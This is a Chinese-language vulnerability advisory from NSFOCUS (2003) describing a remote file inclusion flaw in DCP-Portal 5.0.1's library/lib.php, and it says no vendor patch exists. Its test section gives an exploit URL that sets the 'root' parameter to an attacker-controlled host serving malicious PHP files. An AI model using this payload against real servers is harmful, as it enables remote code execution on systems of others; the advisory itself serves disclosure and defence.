首页 -> 安全研究

安全研究

安全漏洞
DCP-Portal远程文件包含漏洞

发布日期:2003-01-06
更新日期:2003-01-13

受影响系统:
DCP-Portal DCP-Portal 5.0.1
描述:
BUGTRAQ  ID: 6525

DCP-Portal是一款网站内容管理系统,包括成员管理、投票系统、日历系统等。

DCP-Portal的'library/lib.php'脚本对用户提交的输入缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的任意文件,以WEB进程权限在系统上执行任意命令。

'library/lib.php'脚本对用户提交给'root'参数的数据缺少充分检查,攻击者提供指向自己控制服务器上的恶意文件的路径作为'root'参数,如果远程文件是PHP脚本代码,就可能以WEB进程权限在系统服务器上执行这些代码。

<*来源:Frog Man (leseulfrog@hotmail.com
  
  链接:http://www.frog-man.org/tutos/DCP-Portal.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man (leseulfrog@hotmail.com)提供了如下测试方法:

http://[target]/library/lib.php?root=http://[attacker ] with

- http://[attacker]/library/lib_nav.php
- http://[attacker]/library/lib_mods.php
- http://[attacker]/library/lib_admin.php
- http://[attacker]/library/lib_3rd.php

建议:
厂商补丁:

DCP-Portal
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dcp-portal.com/

浏览次数:2899
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障